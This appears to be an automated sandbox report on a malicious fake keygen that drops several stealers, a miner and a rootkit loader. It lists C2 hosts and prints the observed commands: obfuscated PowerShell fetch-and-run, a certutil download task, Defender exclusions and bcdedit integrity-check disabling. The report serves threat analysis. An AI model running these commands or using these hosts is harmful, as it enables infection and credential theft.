Analysis

  • max time kernel
    300s
  • max time network
    304s
  • platform
    windows10_x64
  • resource
    win10v20201028
  • submitted
    24-03-2021 09:50

General

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

http://labsclub.com/welcome

Extracted

Family

azorult

C2

http://kvaka.li/1210776429.php

Extracted

Family

fickerstealer

C2

lukkeze.club:80

Extracted

Family

icedid

Campaign

1319278762

C2

213podellkk.website

Extracted

Family

cryptbot

C2

bazfr32.top

morwhy03.top

Attributes
  • payload_url

    http://akrvt04.top/download.php?file=lv.exe

Extracted

Family

metasploit

Version

windows/single_exec

Signatures

  • Azorult

    An information stealer that was first discovered in 2016, targeting browsing history and passwords.

  • CryptBot

    A C++ stealer distributed widely in bundle with other software.

  • CryptBot Payload 2 IoCs
  • Glupteba

    Glupteba is a modular loader written in Golang with various components.

  • Glupteba Payload 3 IoCs
  • IcedID, BokBot

    IcedID is a banking trojan capable of stealing credentials.

  • MetaSploit

    Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.

  • Pony,Fareit

    Pony is a Remote Access Trojan application that steals information.

  • Suspicious use of NtCreateUserProcessOtherParentProcess 5 IoCs
  • Vidar

    Vidar is an infostealer based on Arkei stealer.

  • Windows security bypass 2 TTPs
  • fickerstealer

    Ficker is an infostealer written in Rust and ASM.

  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • Checks for common network interception software 1 TTPs

    Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.

  • IcedID First Stage Loader 1 IoCs
  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
  • Modifies boot configuration data using bcdedit 15 IoCs
  • XMRig Miner Payload 2 IoCs
  • Blocklisted process makes network request 22 IoCs
  • Downloads MZ/PE file
  • Drops file in Drivers directory 5 IoCs
  • Executes dropped EXE 64 IoCs
  • Looks for VMWare Tools registry key 2 TTPs
  • Modifies Windows Firewall 1 TTPs
  • Possible attempt to disable PatchGuard 2 TTPs

    Rootkits can use kernel patching to embed themselves in an operating system.

  • Sets file to hidden 1 TTPs

    Modifies file attributes to stop it showing in Explorer etc.

  • Sets service image path in registry 2 TTPs
  • UPX packed file 1 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Checks computer location settings 2 TTPs 4 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 3 IoCs
  • Loads dropped DLL 64 IoCs
  • Modifies file permissions 1 TTPs 2 IoCs
  • Reads data files stored by FTP clients 2 TTPs

    Tries to access configuration files associated with programs like FileZilla.

  • Reads local data of messenger clients 2 TTPs

    Infostealers often target stored data of messaging applications, which can include saved credentials and account information.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Windows security modification 2 TTPs 10 IoCs
  • Accesses 2FA software files, possible credential harvesting 2 TTPs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 14 IoCs
  • Checks for any installed AV software in registry 1 TTPs 53 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Enumerates connected drives 3 TTPs 48 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 8 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Maps connected drives based on registry 3 TTPs 4 IoCs

    Disk information is often read in order to detect sandboxing environments.

  • Drops file in System32 directory 17 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 3 IoCs
  • Suspicious use of SetThreadContext 4 IoCs
  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 35 IoCs
  • Launches sc.exe

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 1 IoCs
  • Checks SCSI registry key(s) 3 TTPs 64 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 10 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 3 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Delays execution with timeout.exe 11 IoCs
  • Enumerates system info in registry 2 TTPs 2 IoCs
  • Kills process with taskkill 4 IoCs
  • Modifies Internet Explorer settings 1 TTPs 4 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies registry class 64 IoCs
  • Modifies system certificate store 2 TTPs 15 IoCs
  • Runs ping.exe 1 TTPs 7 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: LoadsDriver 3 IoCs
  • Suspicious behavior: MapViewOfSection 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 64 IoCs
  • Suspicious use of SetWindowsHookEx 27 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Views/modifies file attributes 1 TTPs 5 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\Xforce_keygen_by_KeygenNinja.exe
    "C:\Users\Admin\AppData\Local\Temp\Xforce_keygen_by_KeygenNinja.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:3884
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen.bat" "
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:3548
      • C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-pr.exe
        keygen-pr.exe -p83fsase3Ge
        3⤵
        • Executes dropped EXE
        • Suspicious use of WriteProcessMemory
        PID:756
        • C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe
          "C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe"
          4⤵
          • Executes dropped EXE
          • Suspicious use of SetThreadContext
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:4072
          • C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe
            C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe -txt -scanlocal -file:potato.dat
            5⤵
            • Executes dropped EXE
            PID:2052
      • C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-1.exe
        keygen-step-1.exe
        3⤵
        • Executes dropped EXE
        PID:1124
      • C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-3.exe
        keygen-step-3.exe
        3⤵
        • Executes dropped EXE
        • Suspicious use of WriteProcessMemory
        PID:3936
        • C:\Windows\SysWOW64\cmd.exe
          cmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-3.exe"
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:2380
          • C:\Windows\SysWOW64\PING.EXE
            ping 1.1.1.1 -n 1 -w 3000
            5⤵
            • Runs ping.exe
            PID:2820
      • C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-4.exe
        keygen-step-4.exe
        3⤵
        • Executes dropped EXE
        • Suspicious use of WriteProcessMemory
        PID:3944
        • C:\Users\Admin\AppData\Local\Temp\RarSFX2\Setup.exe
          "C:\Users\Admin\AppData\Local\Temp\RarSFX2\Setup.exe"
          4⤵
          • Executes dropped EXE
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:3896
          • C:\Users\Admin\AppData\Local\Temp\IGLVOCZ0VB\multitimer.exe
            "C:\Users\Admin\AppData\Local\Temp\IGLVOCZ0VB\multitimer.exe" 0 3060197d33d91c80.94013368 0 101
            5⤵
            • Executes dropped EXE
            • Drops file in Windows directory
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:3688
            • C:\Users\Admin\AppData\Local\Temp\IGLVOCZ0VB\multitimer.exe
              "C:\Users\Admin\AppData\Local\Temp\IGLVOCZ0VB\multitimer.exe" 1 3.1616579446.605b0b765da7c 101
              6⤵
              • Executes dropped EXE
              • Adds Run key to start application
              • Suspicious use of WriteProcessMemory
              PID:4556
              • C:\Users\Admin\AppData\Local\Temp\IGLVOCZ0VB\multitimer.exe
                "C:\Users\Admin\AppData\Local\Temp\IGLVOCZ0VB\multitimer.exe" 2 3.1616579446.605b0b765da7c
                7⤵
                • Executes dropped EXE
                • Checks for any installed AV software in registry
                • Maps connected drives based on registry
                • Enumerates system info in registry
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                • Suspicious use of WriteProcessMemory
                PID:4672
                • C:\Users\Admin\AppData\Local\Temp\1izm4jaltpz\vict.exe
                  "C:\Users\Admin\AppData\Local\Temp\1izm4jaltpz\vict.exe" /VERYSILENT /id=535
                  8⤵
                  • Executes dropped EXE
                  • Suspicious use of SetWindowsHookEx
                  PID:4452
                  • C:\Users\Admin\AppData\Local\Temp\is-Q004B.tmp\vict.tmp
                    "C:\Users\Admin\AppData\Local\Temp\is-Q004B.tmp\vict.tmp" /SL5="$501F2,870426,780800,C:\Users\Admin\AppData\Local\Temp\1izm4jaltpz\vict.exe" /VERYSILENT /id=535
                    9⤵
                    • Executes dropped EXE
                    • Loads dropped DLL
                    • Drops file in Program Files directory
                    • Suspicious use of FindShellTrayWindow
                    • Suspicious use of SetWindowsHookEx
                    PID:2592
                    • C:\Users\Admin\AppData\Local\Temp\is-A94G1.tmp\winhost.exe
                      "C:\Users\Admin\AppData\Local\Temp\is-A94G1.tmp\winhost.exe" 535
                      10⤵
                      • Executes dropped EXE
                      • Suspicious use of SetWindowsHookEx
                      PID:188
                      • C:\Windows\SysWOW64\cmd.exe
                        cmd /C regsvr32 /s "C:\Users\Admin\AppData\Local\Temp\mQBmadnGU.dll"
                        11⤵
                          PID:6064
                          • C:\Windows\SysWOW64\regsvr32.exe
                            regsvr32 /s "C:\Users\Admin\AppData\Local\Temp\mQBmadnGU.dll"
                            12⤵
                            • Loads dropped DLL
                            • Modifies Internet Explorer settings
                            • Modifies registry class
                            • Suspicious use of AdjustPrivilegeToken
                            PID:4632
                            • C:\Windows\system32\regsvr32.exe
                              /s "C:\Users\Admin\AppData\Local\Temp\mQBmadnGU.dll"
                              13⤵
                              • Loads dropped DLL
                              PID:5244
                        • C:\Windows\SysWOW64\cmd.exe
                          cmd /C regsvr32 /s "C:\Users\Admin\AppData\Local\Temp\mQBmadnGU.dllvw2X1EFY2.dll"
                          11⤵
                            PID:6708
                            • C:\Windows\SysWOW64\regsvr32.exe
                              regsvr32 /s "C:\Users\Admin\AppData\Local\Temp\mQBmadnGU.dllvw2X1EFY2.dll"
                              12⤵
                                PID:6852
                            • C:\Windows\SysWOW64\cmd.exe
                              cmd.exe /c start /B powershell -windowstyle hidden -command "&{$t='#i#ex##@(n#ew#####-#ob#jec#t N#et#.W#eb#Cl#ie#nt#).###########Up#loa#dSt##########ri#ng(#''h#t#tp#:#//labsclub.com/#w#el#co#me''#,#''Cr#ys#ta#lP#ig''#############)##|#ie##x'.replace('#','').split('@',5);&$t[0]$t[1]}"
                              11⤵
                                PID:5752
                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                  powershell -windowstyle hidden -command "&{$t='#i#ex##@(n#ew#####-#ob#jec#t N#et#.W#eb#Cl#ie#nt#).###########Up#loa#dSt##########ri#ng(#''h#t#tp#:#//labsclub.com/#w#el#co#me''#,#''Cr#ys#ta#lP#ig''#############)##|#ie##x'.replace('#','').split('@',5);&$t[0]$t[1]}"
                                  12⤵
                                  • Blocklisted process makes network request
                                  PID:6660
                        • C:\Users\Admin\AppData\Local\Temp\hm2i5iu3uz2\1pfue0at5xy.exe
                          "C:\Users\Admin\AppData\Local\Temp\hm2i5iu3uz2\1pfue0at5xy.exe" /VERYSILENT
                          8⤵
                          • Executes dropped EXE
                          • Suspicious use of SetWindowsHookEx
                          PID:4548
                          • C:\Users\Admin\AppData\Local\Temp\is-FQ950.tmp\1pfue0at5xy.tmp
                            "C:\Users\Admin\AppData\Local\Temp\is-FQ950.tmp\1pfue0at5xy.tmp" /SL5="$201E2,2592217,780800,C:\Users\Admin\AppData\Local\Temp\hm2i5iu3uz2\1pfue0at5xy.exe" /VERYSILENT
                            9⤵
                            • Executes dropped EXE
                            • Loads dropped DLL
                            • Drops file in Program Files directory
                            • Suspicious use of FindShellTrayWindow
                            • Suspicious use of SetWindowsHookEx
                            PID:2632
                            • C:\Users\Admin\AppData\Local\Temp\is-3GBV8.tmp\winlthsth.exe
                              "C:\Users\Admin\AppData\Local\Temp\is-3GBV8.tmp\winlthsth.exe"
                              10⤵
                              • Executes dropped EXE
                              • Suspicious use of SetWindowsHookEx
                              PID:4760
                              • C:\Windows\SysWOW64\WerFault.exe
                                C:\Windows\SysWOW64\WerFault.exe -u -p 4760 -s 496
                                11⤵
                                • Drops file in Windows directory
                                • Program crash
                                • Suspicious use of AdjustPrivilegeToken
                                PID:5664
                        • C:\Users\Admin\AppData\Local\Temp\5bw5yk4xihc\vpn.exe
                          "C:\Users\Admin\AppData\Local\Temp\5bw5yk4xihc\vpn.exe" /silent /subid=482
                          8⤵
                          • Executes dropped EXE
                          • Suspicious use of SetWindowsHookEx
                          PID:4644
                          • C:\Users\Admin\AppData\Local\Temp\is-2GSD5.tmp\vpn.tmp
                            "C:\Users\Admin\AppData\Local\Temp\is-2GSD5.tmp\vpn.tmp" /SL5="$103AC,15170975,270336,C:\Users\Admin\AppData\Local\Temp\5bw5yk4xihc\vpn.exe" /silent /subid=482
                            9⤵
                            • Executes dropped EXE
                            • Loads dropped DLL
                            • Drops file in Program Files directory
                            • Modifies registry class
                            • Modifies system certificate store
                            • Suspicious use of AdjustPrivilegeToken
                            • Suspicious use of FindShellTrayWindow
                            • Suspicious use of SetWindowsHookEx
                            PID:3616
                            • C:\Windows\SysWOW64\cmd.exe
                              C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\uninstall.bat" "
                              10⤵
                                PID:5984
                                • C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe
                                  tapinstall.exe remove tap0901
                                  11⤵
                                  • Executes dropped EXE
                                  • Checks SCSI registry key(s)
                                  • Suspicious use of SetWindowsHookEx
                                  PID:4232
                              • C:\Windows\SysWOW64\cmd.exe
                                C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\install.bat" "
                                10⤵
                                  PID:2984
                                  • C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe
                                    tapinstall.exe install OemVista.inf tap0901
                                    11⤵
                                    • Executes dropped EXE
                                    • Drops file in System32 directory
                                    • Drops file in Windows directory
                                    • Checks SCSI registry key(s)
                                    • Modifies system certificate store
                                    • Suspicious use of SetWindowsHookEx
                                    PID:5208
                                • C:\Program Files (x86)\MaskVPN\mask_svc.exe
                                  "C:\Program Files (x86)\MaskVPN\mask_svc.exe" uninstall
                                  10⤵
                                  • Executes dropped EXE
                                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                                  • Suspicious use of SetWindowsHookEx
                                  PID:6728
                                • C:\Program Files (x86)\MaskVPN\mask_svc.exe
                                  "C:\Program Files (x86)\MaskVPN\mask_svc.exe" install
                                  10⤵
                                  • Executes dropped EXE
                                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                                  • Suspicious use of SetWindowsHookEx
                                  PID:6216
                            • C:\Users\Admin\AppData\Local\Temp\su505150yiu\IBInstaller_97039.exe
                              "C:\Users\Admin\AppData\Local\Temp\su505150yiu\IBInstaller_97039.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs97039 -token mtn1co3fo4gs5vwq
                              8⤵
                              • Executes dropped EXE
                              • Suspicious use of SetWindowsHookEx
                              PID:4748
                              • C:\Users\Admin\AppData\Local\Temp\is-64NGH.tmp\IBInstaller_97039.tmp
                                "C:\Users\Admin\AppData\Local\Temp\is-64NGH.tmp\IBInstaller_97039.tmp" /SL5="$103AE,9935228,721408,C:\Users\Admin\AppData\Local\Temp\su505150yiu\IBInstaller_97039.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs97039 -token mtn1co3fo4gs5vwq
                                9⤵
                                • Executes dropped EXE
                                • Loads dropped DLL
                                • Drops file in Program Files directory
                                • Suspicious use of FindShellTrayWindow
                                • Suspicious use of SetWindowsHookEx
                                PID:5052
                                • C:\Windows\SysWOW64\cmd.exe
                                  "cmd.exe" /c start http://italyfabricone.club/pgudonqntu/zmsaksepfx.php?xdl=mtn1co3fo4gs5vwq^&cid=97039
                                  10⤵
                                  • Checks computer location settings
                                  PID:5224
                                • C:\Users\Admin\AppData\Local\Temp\is-MP22D.tmp\{app}\chrome_proxy.exe
                                  "C:\Users\Admin\AppData\Local\Temp\is-MP22D.tmp\{app}\chrome_proxy.exe"
                                  10⤵
                                  • Executes dropped EXE
                                  PID:5252
                                  • C:\Windows\SysWOW64\cmd.exe
                                    "C:\Windows\system32\cmd.exe" /c ping localhost -n 4 && del "C:\Users\Admin\AppData\Local\Temp\is-MP22D.tmp\{app}\chrome_proxy.exe"
                                    11⤵
                                      PID:4132
                                      • C:\Windows\SysWOW64\PING.EXE
                                        ping localhost -n 4
                                        12⤵
                                        • Runs ping.exe
                                        PID:4004
                              • C:\Users\Admin\AppData\Local\Temp\srp3sjd3sb1\app.exe
                                "C:\Users\Admin\AppData\Local\Temp\srp3sjd3sb1\app.exe" /8-23
                                8⤵
                                • Executes dropped EXE
                                • Loads dropped DLL
                                • Drops file in Program Files directory
                                • Suspicious use of SetWindowsHookEx
                                PID:4228
                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Program Files (x86)\Winter-Bush"
                                  9⤵
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:5296
                                • C:\Program Files (x86)\Winter-Bush\7za.exe
                                  "C:\Program Files (x86)\Winter-Bush\7za.exe" e -p154.61.71.51 winamp-plugins.7z
                                  9⤵
                                  • Executes dropped EXE
                                  • Drops file in Program Files directory
                                  • Suspicious use of SetWindowsHookEx
                                  PID:4892
                                • C:\Windows\SysWOW64\cmd.exe
                                  "C:\Windows\system32\cmd.exe" /c ""C:\Program Files (x86)\Winter-Bush\app.exe" -map "C:\Program Files (x86)\Winter-Bush\WinmonProcessMonitor.sys""
                                  9⤵
                                    PID:1376
                                    • C:\Program Files (x86)\Winter-Bush\app.exe
                                      "C:\Program Files (x86)\Winter-Bush\app.exe" -map "C:\Program Files (x86)\Winter-Bush\WinmonProcessMonitor.sys"
                                      10⤵
                                      • Executes dropped EXE
                                      • Suspicious behavior: LoadsDriver
                                      PID:6004
                                  • C:\Program Files (x86)\Winter-Bush\7za.exe
                                    "C:\Program Files (x86)\Winter-Bush\7za.exe" e -p154.61.71.51 winamp.7z
                                    9⤵
                                    • Executes dropped EXE
                                    • Drops file in Program Files directory
                                    • Suspicious use of SetWindowsHookEx
                                    PID:1480
                                  • C:\Program Files (x86)\Winter-Bush\app.exe
                                    "C:\Program Files (x86)\Winter-Bush\app.exe" /8-23
                                    9⤵
                                    • Executes dropped EXE
                                    PID:6500
                                    • C:\Program Files (x86)\Winter-Bush\app.exe
                                      "C:\Program Files (x86)\Winter-Bush\app.exe" /8-23
                                      10⤵
                                      • Executes dropped EXE
                                      • Windows security modification
                                      • Adds Run key to start application
                                      • Drops file in Windows directory
                                      • Modifies data under HKEY_USERS
                                      PID:4116
                                      • C:\Windows\System32\cmd.exe
                                        C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
                                        11⤵
                                          PID:5908
                                          • C:\Windows\system32\netsh.exe
                                            netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
                                            12⤵
                                            • Modifies data under HKEY_USERS
                                            PID:6372
                                        • C:\Windows\rss\csrss.exe
                                          C:\Windows\rss\csrss.exe /8-23
                                          11⤵
                                          • Drops file in Drivers directory
                                          • Drops file in Windows directory
                                          • Modifies data under HKEY_USERS
                                          PID:6356
                                          • C:\Windows\SYSTEM32\schtasks.exe
                                            schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
                                            12⤵
                                            • Creates scheduled task(s)
                                            PID:4812
                                          • C:\Windows\SYSTEM32\schtasks.exe
                                            schtasks /CREATE /SC ONLOGON /RL HIGHEST /RU SYSTEM /TR "cmd.exe /C certutil.exe -urlcache -split -f https://fotamene.com/app/app.exe C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe /31340" /TN ScheduledUpdate /F
                                            12⤵
                                            • Creates scheduled task(s)
                                            PID:6788
                                          • C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe
                                            "C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"
                                            12⤵
                                            • Loads dropped DLL
                                            PID:5360
                                            • C:\Windows\system32\bcdedit.exe
                                              C:\Windows\system32\bcdedit.exe -create {71A3C7FC-F751-4982-AEC1-E958357E6813} -d "Windows Fast Mode" -application OSLOADER
                                              13⤵
                                              • Modifies boot configuration data using bcdedit
                                              PID:6156
                                            • C:\Windows\system32\bcdedit.exe
                                              C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} device partition=C:
                                              13⤵
                                              • Modifies boot configuration data using bcdedit
                                              PID:6732
                                            • C:\Windows\system32\bcdedit.exe
                                              C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} osdevice partition=C:
                                              13⤵
                                              • Modifies boot configuration data using bcdedit
                                              PID:5600
                                            • C:\Windows\system32\bcdedit.exe
                                              C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} systemroot \Windows
                                              13⤵
                                              • Modifies boot configuration data using bcdedit
                                              PID:4696
                                            • C:\Windows\system32\bcdedit.exe
                                              C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} path \Windows\system32\osloader.exe
                                              13⤵
                                              • Modifies boot configuration data using bcdedit
                                              PID:6600
                                            • C:\Windows\system32\bcdedit.exe
                                              C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} kernel ntkrnlmp.exe
                                              13⤵
                                              • Modifies boot configuration data using bcdedit
                                              PID:6576
                                            • C:\Windows\system32\bcdedit.exe
                                              C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} recoveryenabled 0
                                              13⤵
                                              • Modifies boot configuration data using bcdedit
                                              PID:6684
                                            • C:\Windows\system32\bcdedit.exe
                                              C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nx OptIn
                                              13⤵
                                              • Modifies boot configuration data using bcdedit
                                              PID:6620
                                            • C:\Windows\system32\bcdedit.exe
                                              C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nointegritychecks 1
                                              13⤵
                                              • Modifies boot configuration data using bcdedit
                                              PID:6580
                                            • C:\Windows\system32\bcdedit.exe
                                              C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} inherit {bootloadersettings}
                                              13⤵
                                              • Modifies boot configuration data using bcdedit
                                              PID:32
                                            • C:\Windows\system32\bcdedit.exe
                                              C:\Windows\system32\bcdedit.exe -displayorder {71A3C7FC-F751-4982-AEC1-E958357E6813} -addlast
                                              13⤵
                                              • Modifies boot configuration data using bcdedit
                                              • Modifies registry class
                                              • Suspicious use of AdjustPrivilegeToken
                                              PID:5320
                                            • C:\Windows\system32\bcdedit.exe
                                              C:\Windows\system32\bcdedit.exe -timeout 0
                                              13⤵
                                              • Modifies boot configuration data using bcdedit
                                              PID:4628
                                            • C:\Windows\system32\bcdedit.exe
                                              C:\Windows\system32\bcdedit.exe -default {71A3C7FC-F751-4982-AEC1-E958357E6813}
                                              13⤵
                                              • Modifies boot configuration data using bcdedit
                                              PID:4800
                                            • C:\Windows\system32\bcdedit.exe
                                              C:\Windows\system32\bcdedit.exe -set bootmenupolicy legacy
                                              13⤵
                                              • Modifies boot configuration data using bcdedit
                                              PID:6828
                                          • C:\Windows\System32\bcdedit.exe
                                            C:\Windows\Sysnative\bcdedit.exe /v
                                            12⤵
                                            • Modifies boot configuration data using bcdedit
                                            PID:4960
                                          • C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe
                                            C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe
                                            12⤵
                                            • Drops file in Drivers directory
                                            PID:5000
                                          • C:\Windows\windefender.exe
                                            "C:\Windows\windefender.exe"
                                            12⤵
                                              PID:5528
                                              • C:\Windows\SysWOW64\cmd.exe
                                                cmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
                                                13⤵
                                                  PID:2388
                                                  • C:\Windows\SysWOW64\sc.exe
                                                    sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
                                                    14⤵
                                                      PID:5952
                                        • C:\Users\Admin\AppData\Local\Temp\xkdjyj3xvpu\kdaf223bvc5.exe
                                          "C:\Users\Admin\AppData\Local\Temp\xkdjyj3xvpu\kdaf223bvc5.exe" /quiet SILENT=1 AF=756
                                          8⤵
                                          • Executes dropped EXE
                                          • Loads dropped DLL
                                          • Enumerates connected drives
                                          • Modifies system certificate store
                                          • Suspicious use of FindShellTrayWindow
                                          PID:5160
                                          • C:\Windows\SysWOW64\msiexec.exe
                                            "C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\Weather\Weather 1.0.0\install\FD7DF1F\Weather Installation.msi" /quiet SILENT=1 AF=756 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\xkdjyj3xvpu\kdaf223bvc5.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\xkdjyj3xvpu\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1616320362 /quiet SILENT=1 AF=756 " AF="756" AI_CONTROL_VISUAL_STYLE="16578540;16578540;14988840;12422912"
                                            9⤵
                                              PID:3460
                                          • C:\Users\Admin\AppData\Local\Temp\5t2kifefote\AwesomePoolU1.exe
                                            "C:\Users\Admin\AppData\Local\Temp\5t2kifefote\AwesomePoolU1.exe"
                                            8⤵
                                            • Executes dropped EXE
                                            • Suspicious use of AdjustPrivilegeToken
                                            PID:4240
                                          • C:\Users\Admin\AppData\Local\Temp\pqqx2rqk0mh\to4gvbwp02i.exe
                                            "C:\Users\Admin\AppData\Local\Temp\pqqx2rqk0mh\to4gvbwp02i.exe" /ustwo INSTALL
                                            8⤵
                                            • Executes dropped EXE
                                            PID:4200
                                            • C:\Windows\SysWOW64\cmd.exe
                                              "C:\Windows\System32\cmd.exe" /c taskkill /im "to4gvbwp02i.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\pqqx2rqk0mh\to4gvbwp02i.exe" & exit
                                              9⤵
                                                PID:5992
                                                • C:\Windows\SysWOW64\taskkill.exe
                                                  taskkill /im "to4gvbwp02i.exe" /f
                                                  10⤵
                                                  • Kills process with taskkill
                                                  PID:4088
                                      • C:\Users\Admin\AppData\Local\Temp\R8T3AIDM5L\setups.exe
                                        "C:\Users\Admin\AppData\Local\Temp\R8T3AIDM5L\setups.exe" ll
                                        5⤵
                                        • Executes dropped EXE
                                        • Suspicious use of SetWindowsHookEx
                                        • Suspicious use of WriteProcessMemory
                                        PID:3360
                                        • C:\Users\Admin\AppData\Local\Temp\is-1CI4G.tmp\setups.tmp
                                          "C:\Users\Admin\AppData\Local\Temp\is-1CI4G.tmp\setups.tmp" /SL5="$501CA,250374,58368,C:\Users\Admin\AppData\Local\Temp\R8T3AIDM5L\setups.exe" ll
                                          6⤵
                                          • Executes dropped EXE
                                          • Checks computer location settings
                                          • Loads dropped DLL
                                          • Suspicious behavior: EnumeratesProcesses
                                          • Suspicious use of SetWindowsHookEx
                                          PID:1684
                                    • C:\Users\Admin\AppData\Local\Temp\RarSFX2\Install.exe
                                      "C:\Users\Admin\AppData\Local\Temp\RarSFX2\Install.exe"
                                      4⤵
                                      • Executes dropped EXE
                                      • Adds Run key to start application
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:1456
                                      • C:\Users\Admin\Documents\kOPL6h60sBSiAG2LjbH3dC9b.exe
                                        "C:\Users\Admin\Documents\kOPL6h60sBSiAG2LjbH3dC9b.exe"
                                        5⤵
                                        • Executes dropped EXE
                                        • Adds Run key to start application
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:1504
                                        • C:\Users\Admin\Documents\Ng7OPU17uqoZWsnRSALxsfva.exe
                                          "C:\Users\Admin\Documents\Ng7OPU17uqoZWsnRSALxsfva.exe"
